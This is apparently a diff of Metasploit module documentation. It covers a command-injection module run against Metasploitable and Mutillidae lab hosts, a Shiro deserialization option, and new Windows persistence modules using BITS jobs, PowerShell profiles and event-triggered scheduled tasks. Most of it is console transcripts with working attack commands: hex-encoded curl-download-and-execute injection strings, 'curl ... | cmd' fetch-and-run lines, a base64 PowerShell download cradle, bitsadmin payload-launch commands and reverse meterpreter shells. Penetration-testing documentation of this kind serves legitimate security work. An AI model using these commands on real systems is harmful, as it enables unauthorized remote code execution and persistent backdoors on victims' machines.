+   LHOST           tap0             yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      mANdNVqs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/os_cmd_exec) > check
+[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
+[+] 10.0.0.10:80 - The target is vulnerable.
+msf exploit(multi/http/os_cmd_exec) > run
+[*] Started reverse TCP handler on 10.0.0.1:4444
+[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
+[*] Sending stage (1062760 bytes) to 10.0.0.10
+[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : metasploitable.localdomain
+OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter >
+```
+
+### Mutillidae
+
+This is on Metasploitable 2 VM:
+
+```console
+msf > use exploits/multi/http/os_cmd_exec
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
+msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
+RHOSTS => 10.0.0.10
+msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
+LHOST => tap0
+msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
+URIPATH => /mutillidae/index.php?page=dns-lookup.php
+msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
+POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
+msf exploit(multi/http/os_cmd_exec) >
+msf exploit(multi/http/os_cmd_exec) > options
+
+Module options (exploit/multi/http/os_cmd_exec):
+
+   Name      Current Setting                                                Required  Description
+   ----      ---------------                                                --------  -----------
+   HEADERS                                                                  no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
+   POSTDATA  target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS  no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
+   Proxies                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS    10.0.0.10                                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80                                                             yes       The target port (TCP)
+   SSL       false                                                          no        Negotiate SSL/TLS for outgoing connections
+   URIPATH   /mutillidae/index.php?page=dns-lookup.php                      yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
+   VHOST                                                                    no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
+                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           tap0             yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      SYonhqJf         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/os_cmd_exec) > check
+[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
+[+] 10.0.0.10:80 - The target is vulnerable.
+msf exploit(multi/http/os_cmd_exec) > run
+[*] Started reverse TCP handler on 10.0.0.1:4444
+[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
+[*] Sending stage (1062760 bytes) to 10.0.0.10
+[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : metasploitable.localdomain
+OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md

@@ -7,8 +7,10 @@ unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
 server as the value to the `rememberMe` cookie. This will result in code
 execution in the context of the web server.
 
-The YSoSerial `CommonsCollections2` payload is known to work and is the one
-leveraged by this module.
+The YSoSerial `CommonsCollections2` payload is known to work and is the
+default gadget chain used by this module. The gadget chain is configurable
+via the `JAVA_GADGET_CHAIN` option; the selected chain must be available on
+the target's classpath.
 
 Note that other versions of Apache Shiro may also be exploitable if the
 encryption key used by Shiro to encrypt `rememberMe` cookies is known.
@@ -29,9 +31,13 @@ You can use <https://github.com/Medicean/VulApps/tree/master/s/shiro/1>.
 3. `run`
 
 ## Options
+
 ### ENC_KEY
 The encryption key the target Apache Shiro server is using to encrypt its `rememberMe` cookies.
 
+### JAVA_GADGET_CHAIN
+The Java deserialization gadget chain to use. The chain must be available on the target's classpath.
+
 ## Scenarios
 
 ### Tested on GNU/Linux x86_64 using Shiro-1.2.4
@@ -43,15 +49,16 @@ msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options
 
 Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):
 
-   Name       Current Setting           Required  Description
-   ----       ---------------           --------  -----------
-   ENC_KEY    kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
-   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      80                        yes       The target port (TCP)
-   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                         yes       Base directory path
-   VHOST                                no        HTTP server virtual host
+   Name               Current Setting           Required  Description
+   ----               ---------------           --------  -----------
+   ENC_KEY            kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
+   JAVA_GADGET_CHAIN  CommonsCollections2       yes       The Java gadget chain to use for deserialization
+   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT              80                        yes       The target port (TCP)
+   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                         yes       Base directory path
+   VHOST                                        no        HTTP server virtual host
 
 
 Payload options (cmd/unix/reverse_bash):

documentation/modules/exploit/windows/persistence/bits.md

@@ -0,0 +1,165 @@
+## Vulnerable Application
+
+This module establishes persistence by exclusively through a BITS job that
+downloads and executes a payload. Background Intelligent Transfer Service
+(BITS) is a Windows service for transferring files in the background
+using idle network bandwidth. BITS jobs are persistent and will resume
+across reboots until completed or cancelled.
+
+BITS does not include a timing mechanism for when jobs are run, so we control that
+in how we respond to the HTTP requests from the BITS client. This avoids needing
+to set up an external trigger to start the job like a scheduled task or similar.
+
+Similarily, BITS jobs are somewhat clock agnostic, so while we can set some
+time parameters, the aren't a guarantee of when the job will actually run.
+Jobs that we've idled via HTTP server response will have a "CONNECTING" status.
+
+BITS is fickle about the HTTP responses it expects, so we have to be precise in
+how the server responds. For a HEAD request we need to send back a correct
+Content-Length header matching the payload size, but with no body. For GET requests
+we need to handle byte range requests properly (althought not always used),
+sending back the appropriate
+Content-Range headers. If we respond incorrectly BITS may error out or retry
+in unexpected ways. However, we can trick BITS into not getting the payload until
+we want by responding to the GET requests with no body (aka how we responded to
+the HEAD requests) until our delay time has reached.
+
+### Debugging
+
+To list bits jobs: `bitsadmin /list`
+
+To get more info on a bits job: `bitsadmin /info <guid> /verbose`
+
+To cancel all bits job: `bitsadmin /reset`
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session on Windows
+3. Do: `use exploit/windows/persistence/bits`
+3. Do: `set session #`
+4. Do: `set srvhost <ip>`
+1. Do: `run`
+2. You should get a shell eventually
+
+## Options
+
+### JOB_NAME
+
+The name to use for the bits job provider. (Default: random)
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### DELAY
+
+Delay in seconds before callback. Defaults to `3600`
+
+### RETRY_DELAY
+
+Delay in seconds between retries. Defaults to `600`
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Windows 10 1909 (10.0 Build 18363).
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49712) at 2026-01-01 19:33:30 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/bits
+msf exploit(windows/persistence/bits) > set session 1
+session => 1
+msf exploit(windows/persistence/bits) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/bits) > set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+msf exploit(windows/persistence/bits) > set srvport 80
+srvport => 80
+msf exploit(windows/persistence/bits) > set delay 200
+delay => 200
+msf exploit(windows/persistence/bits) > set retry_delay 60
+retry_delay => 60
+msf exploit(windows/persistence/bits) > rexploit
+[*] Reloading module...
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/bits) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Likely exploitable
+[*] Using URL: http://1.1.1.1/VkVKYnWc
+[+] Successfully created BITS job T9vesd8HA with ID Created job {E7E39BA4-D14E-4B8F-B0DF-06CCF233E28F}.
+[*] Executing: bitsadmin /addfile "T9vesd8HA" "http://1.1.1.1:80/VkVKYnWc" "C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe"
+    Added http://1.1.1.1:80/VkVKYnWc -> C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe to job.
+[*] Executing: bitsadmin /SetNotifyCmdLine "T9vesd8HA" "cmd.exe" "/c bitsadmin /complete \"T9vesd8HA\" && if exist \"C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe\" start /b \"\" \"C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe\"""
+    notification command line set to 'cmd.exe' '/c bitsadmin /complete "T9vesd8HA" && if exist "C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe" start /b "" "C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe"" '.
+[*] Executing: bitsadmin /SetMinRetryDelay "T9vesd8HA" 60
+    Minimum retry delay set to 60.
+[*] Executing: bitsadmin /setpriority "T9vesd8HA" high
+    Priority set to HIGH.
+[*] Executing: bitsadmin /setnoprogresstimeout "T9vesd8HA" 10
+    No progress timeout set to 10.
+[*] Executing: bitsadmin /resume "T9vesd8HA"
+[*] HTTP Server: HEAD /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
+[+] HTTP Server: HEAD request received, sending response
+[*] HTTP Server: GET /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
+[*] HTTP Server: Early BITS connection, waiting till 01/01/2026 19:51:26 (198s left), sending empty body back to force a retry
+    Job resumed.
+[+] Persistence installed! Payload will be downloaded to C:\Users\windows\AppData\Local\Temp\QKozHRG1i.exe when the BITS job T9vesd8HA runs.
+msf exploit(windows/persistence/bits) > [*] HTTP Server: GET /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
+[*] HTTP Server: Sending full payload to BITS client
+[*] HTTP Server: GET /VkVKYnWc requested by Microsoft BITS/7.8 on 2.2.2.2
+[*] HTTP Server: Sending full payload to BITS client
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49744) at 2026-01-01 19:53:15 -0500
+```

documentation/modules/exploit/windows/persistence/powershell_profile.md

@@ -0,0 +1,129 @@
+## Vulnerable Application
+
+This module establishes persistence by modifying a PowerShell profile script, which is automatically
+executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) 
+and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell on Windows
+3. Do: `use exploit/windows/persistence/powershell_profile`
+4. Do: `set payload [payload]`
+5. Do: `set session #`
+6. Do: `run`
+7. You should get a shell when powershell is opened on the target machine.
+
+## Options
+
+### PROFILE
+
+The powershell profile to target. Choices are `AUTO`, `ALLUSERSALLHOSTS`, `ALLUSERSCURRENTHOST`, `CURRENTUSERALLHOSTS`, `CURRENTUSERCURRENTHOST`.
+Defaults to `AUTO`
+
+### CREATE
+
+If a profile file doesnt exist, create one. Defaults to `false`
+
+### EXECUTIONPOLICY
+
+Attempt to update execution policy to execute. Defaults to `true`
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Initial shell
+
+```
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload windows/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload windows/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/NB_U4Lr2Ty2xrjYqvzRVEg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /NB_U4Lr2Ty2xrjYqvzRVEg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /w3
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Client 2.2.2.2 requested /NB_U4Lr2Ty2xrjYqvzRVEg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55201) at 2026-02-04 17:06:23 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/powershell_profile 
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/powershell_profile) > set create true
+create => true
+msf exploit(windows/persistence/powershell_profile) > set EXECUTIONPOLICY true
+EXECUTIONPOLICY => true
+msf exploit(windows/persistence/powershell_profile) > set session 1
+session => 1
+msf exploit(windows/persistence/powershell_profile) > rexploit
+[*] Reloading module...
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/powershell_profile) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Powershell execution policy for CurrentUser (Undefined), will attempt to override
+[*] Updating Powershell execution policy for CurrentUser to RemoteSigned
+[*] C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 does not exist, creating it...
+[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
+[*] C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 does not exist, creating it...
+[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
+[*] C:\Users\windows\Documents\WindowsPowerShell\profile.ps1 does not exist, creating it...
+[*] Powershell command length: 4193
+[*] Appending payload to C:\Users\windows\Documents\WindowsPowerShell\profile.ps1
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260204.1237/WIN10PROLICENSE_20260204.1237.rc
+```
+
+Start powershell on the target computer
+
+```
+[*] Sending stage (190534 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55207) at 2026-02-04 17:13:02 -0500
+```

documentation/modules/exploit/windows/persistence/service_for_user/event.md

@@ -0,0 +1,183 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+This variant uses an event trigger to launch the payload when a
+specified event is logged to the Windows Event Log.
+
+### Event Trigger Ideas
+
+#### Service Start
+
+Services like Windows Update, Google Update etc will trigger this (likely multiple times)
+
+```
+set EVENT_ID 7036
+set EVENT_LOG System
+```
+
+#### Terminal Service Connection
+
+In the System log, Event ID 56 usually comes from the TerminalServices-RemoteConnectionManager or TermDD source.
+
+```
+set EVENT_ID 5156
+set EVENT_LOG System
+set XPATH *[EventData[Data = \'INSERT IP ADDRESS\']]
+```
+
+Trigger the event with `nmap -sV -p 3389 x.x.x.x`
+
+#### Failed Login (admin permissions required)
+
+```
+set EVENT_ID 4625
+set EVENT_LOG Security
+```
+
+Trigger the event with `smbclient` or `auxiliary/scanner/smb/smb_login`
+
+### Event Log Start
+
+Should take place after a reboot
+
+```
+set EVENT_ID 6005
+set EVENT_LOG System
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/event`
+4. Do: `set event_id #`
+5. Do: `set session #`
+6. Do: `run`
+7. Wait for the event to occur, or cause it to occur
+8. You should eventually get a shell.
+
+## Options
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+### EVENT_LOG
+
+The event log to check for event. Defaults to `System`. Choices are: `Application`, `System`, `Security`, `Setup`, `ForwardedEvents`
+
+### EVENT_ID
+
+Event ID to trigger on.
+
+### XPATH
+
+XPath query
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABwAGMATQBzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHAAYwBNAHMALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABwAGMATQBzAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBjAHcAaABtAE4AUAA0AEoAdAB5ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3720
+[*] 2.2.2.2    web_delivery - Delivering Payload (3720 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49554) at 2025-12-27 07:23:36 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/event 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/event) > set event_id 7036
+event_id => 7036
+msf exploit(windows/persistence/service_for_user/event) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/event) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/event) > exploit
